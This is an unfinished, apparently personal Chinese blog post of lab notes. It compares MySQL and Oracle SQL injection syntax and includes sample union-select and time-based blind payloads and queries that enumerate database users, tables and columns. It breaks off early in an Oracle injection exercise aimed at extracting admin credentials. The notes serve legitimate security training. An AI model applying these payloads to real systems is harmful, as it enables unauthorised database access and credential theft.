WEB-无境WEB靶场（待完成）

Maododo

2026-03-13

WEB

WEB靶场内容也比较多，估计要打好久，查漏补缺，慢慢来吧。

Oracle数据库注入

扔一点参考文章：Oracle数据库注入全方位利用

平时测的基本上都是Mysql多一些，Oracle语法更加严格一些，有一些差异这里记录一下：

	Mysql	Oracle SQL
注释	–+（需要带空格）、#、/* xxx */	–+（需要带空格）、/* xxx */
当前用户	CURRENT_USER	USER
SELECT语法相关	SELECT 1;	SELECT 1 FROM dual;（SELECT需要加dual表）
延时盲注	id=1 and sleep(5);	id=1 and dbms_lock.sleep(5) is not null;（布尔转换）
联合查询	id=-1 union select 1, user(), 3;	id=-1 union select 1, user(),3 from dual;
所有用户	select user from mysql.user	`select username from dba_users`（需 dba 权限）`select username from all_users`（普通权限）
表名	select table_name from information_schema.tables where table_schema=database()	`select table_name from user_tables`（当前用户表）`select table_name from all_tables`（所有可访问表）
字段名	select column_name from information_schema.columns where table_name=’users’	`select column_name from user_tab_columns where table_name='USERS'`（Oracle 表名 / 字段名默认大写！

Oracle 数据库 sql注入练习一

请通过sql注入获取该系统管理员账号密码，登录后台成功获取flag，该系统不存在弱密码，切勿爆破

注入点

找到注入点了，并可以成功地爆破出USER